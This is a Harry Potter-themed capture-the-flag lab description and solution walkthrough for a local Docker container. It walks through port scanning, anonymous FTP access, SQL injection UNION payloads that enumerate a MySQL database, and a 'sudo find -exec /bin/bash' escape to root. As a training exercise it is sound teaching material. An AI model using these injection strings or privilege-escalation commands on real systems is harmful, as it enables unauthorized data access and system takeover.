🪄 Welcome to Hogwarts School of Witchcraft and Wizardry 🪄

The Wizarding Cup tournament is about to begin.

Your objective is to explore this enchanted environment, uncover hidden secrets, and find various hidden FLAGS that test your skill in mastering digital magic.

Prepare to face privilege escalation challenges and prove you are worthy of being a true wizard or witch.

Are you ready to accept the challenge and unravel the mysteries of Hogwarts?
May the magic be with you!

REQUIREMENTS

1. Start the container:

./auto_deploy.sh hogwarts-ctf.tar

2. Start with nmap to check which ports are open:

nmap -sS -sV -Pn IP-Lab

When you scan the host's default interface in the Docker bridge network, you're actually scanning the host from outside the container, not the ports that Docker has mapped locally on your machine.

For more information, you can run: nmap -sS -sV -Pn localhost

If you scan localhost, you are seeing the ports mapped from Docker to the host (for example, 8080:80, 2222:22, etc.), because Docker is performing NAT and exposing those ports locally on your system.

Good luck with the challenge, and may the magic be with you!

SOLUTION TO THE CYBER

 EXERCISE

Port Scanning

The first thing we should do once the container is running is to perform a port scan to determine where to begin our investigation.

Solution: nmap -sS -sV -Pn localhost

This will return a list of open ports. In this case, the ports would be:

• Port 2121
• Port 2222
• Port 8080
• Port 8443

HINT: I ​​would start in order, that is, with port 2121.

FTP Service

Our FTP (File Transfer Protocol) service is located on port 2121. To access it, you would need credentials, but since we don't know them...

A typical vulnerability of this protocol can occur due to misconfiguration that allows access as an anonymous user. To do this, we simply need to:

HINT: Try logging in as an anonymous user

• ftp anonymous 2121 (Press Enter)
• When prompted for the password (Press Enter)

Now that we're in, we can investigate if any relevant information has been left and read it. In this case, we've obtained credentials for the user "hermione".

• ftp hermione 2121
• User's password

If we log in again with the new credentials, we'll have access to Tom Riddle's diary and obtain a new clue for the next service (Web)

Web Service Part One

If we open our browser and enter https://localhost:8080 in the URL bar, we can access the Ministry of Magic's website. There, we'll find a search engine for Ministry documents.

The first thing you'll see is a list of recently searched files. Ideally, the student should download them. To do this, they should copy the file names from the suggestions, paste them into the search bar, and download them. This is called the Rabbit Hole technique (meaning they waste time searching for unnecessary information to mislead you).

HINT: Copy the entire file name and then search.

When they get tired of searching, they should notice a login button at the top of the website. The credentials they should try are those of the user "hermione," as these are the only ones we have.

When logged in as "hermione," a new file will appear in the suggestions, but it will be partially hidden. If they try to download it, they'll get a message saying they don't have sufficient permissions.

The goal of this challenge is to gradually increase privileges and eventually become a website administrator.

Web Service Part Two

If we access our browser and enter https://localhost:8443 in the URL bar, we can access the Gringotts Bank website. Another search engine will appear, but this time we won't be searching for files. Instead, it will display information about famous people or other relevant data. To do this, we'll need to know SQL to query the linked database.

HINT: You should review SQL statements and remember UNION.

For this service, I have a user named albus_dumbledore who has normal user access to view their database and wants to exploit a MySQL vulnerability, but wants to see more tables than just their own.

• View all records in the Azkaban table: ' OR '1'='1

• View the database name: ' UNION SELECT database(), null #

• View other tables in the database: 'UNION SELECT table_name, null FROM information_schema.tables WHERE table_schema = 'gringotts' #

• View specific columns in the desired table (such as ollivanders in this case):
'UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'ollivanders' #

• View values ​​in the ollivanders table: 'UNION SELECT info, null FROM ollivanders

This last table will give us a clue for escalating privileges in SSH to go from the severus_snape user to the root user.

SSH Service Part Two

HINT: What should you check to escalate privileges? You did it before.

If we switch back to our user severus_snape and run the `sudo -l` command again, we can see that the `find` command can be executed as the root user by doing:

• `sudo find . -exec /bin/bash \;`

Now we'll be root, and by searching in the root directory, we'll find our last flag, and we'll have finished the CTF.